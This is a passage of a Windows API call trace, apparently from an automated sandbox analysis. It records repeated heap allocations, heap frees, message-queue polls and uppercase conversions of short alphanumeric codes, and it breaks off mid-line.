[0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x77a7) returned 0x34a2048 [0197.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0197.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0197.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0197.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0197.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0197.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x77a7) returned 0x24df208 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0197.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0197.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0197.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0197.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0197.092] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0197.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0197.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0197.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0197.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0197.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0197.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0197.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0197.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0197.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0197.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.094] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.094] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.094] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.095] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0197.095] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.095] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.095] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.095] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.095] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0197.096] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.096] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0197.096] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.097] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.097] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.097] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.097] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0197.097] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.098] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0197.098] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0197.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.098] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.099] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0197.099] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.099] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0197.099] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.099] HeapFree (in: 